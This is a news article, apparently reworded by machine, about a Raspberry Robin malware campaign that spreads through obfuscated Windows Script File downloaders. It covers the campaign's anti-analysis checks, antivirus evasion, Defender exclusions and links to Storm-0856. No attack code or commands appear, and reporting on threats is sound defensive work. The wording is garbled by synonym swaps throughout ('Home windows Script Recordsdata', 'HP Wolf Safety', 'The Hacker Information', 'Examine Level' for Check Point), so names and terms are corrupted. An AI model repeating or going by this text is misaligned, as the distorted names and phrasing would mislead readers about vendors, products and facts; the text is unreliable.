Cybersecurity researchers have found a brand new Raspberry Robin marketing campaign wave that propagates the malware by way of malicious Home windows Script Recordsdata (WSFs) since March 2024.
“Historically, Raspberry Robin was known to spread through removable media like USB drives, but over time its distributors have experimented with other initial infection vectors,” HP Wolf Safety mentioned in a report shared with The Hacker Information.
Raspberry Robin, additionally referred to as QNAP worm, was first noticed in September 2021 that has since advanced right into a downloader for numerous different payloads lately, reminiscent of SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, and likewise serving as a precursor for ransomware.
Whereas the malware was initially distributed by the use of USB gadgets containing LNK recordsdata that retrieved the payload from a compromised QNAP system, it has since adopted different strategies reminiscent of social engineering and malvertising.
It is attributed to an rising risk cluster tracked by Microsoft as Storm-0856, which has hyperlinks to the broader cybercrime ecosystem comprising teams like Evil Corp, Silence, and TA505.
The newest distribution vector entails the usage of WSF recordsdata which might be supplied for obtain through numerous domains and subdomains.
It is at present not clear how the attackers are directing victims to those URLs, though it is suspected that it may very well be both through spam or malvertising campaigns.
The closely obfuscated WSF file features as a downloader to retrieve the primary DLL payload from a distant server utilizing the curl command, however not earlier than a collection of anti-analysis and anti-virtual machine evaluations are carried out to find out if it is being run in a virtualized surroundings.
It is also designed to terminate the execution if the construct variety of the Home windows working system is decrease than 17063 (which was launched in December 2017) and if the record of operating processes contains antivirus processes related to Avast, Avira, Bitdefender, Examine Level, ESET, and Kaspersky.
What’s extra, it configures Microsoft Defender Antivirus exclusion guidelines in an effort to sidestep detection by including all the essential drive to the exclusion record and stopping it from being scanned.
“The scripts itself are currently not classified as malicious by any an-virus scanners on VirusTotal, demonstrating the evasiveness of the malware and the risk of it causing a serious infection with Raspberry Robin,” HP mentioned.
“The WSF downloader is heavily obfuscated and uses many an-analysis techniques enabling the malware to evade detection and slow down analysis.”
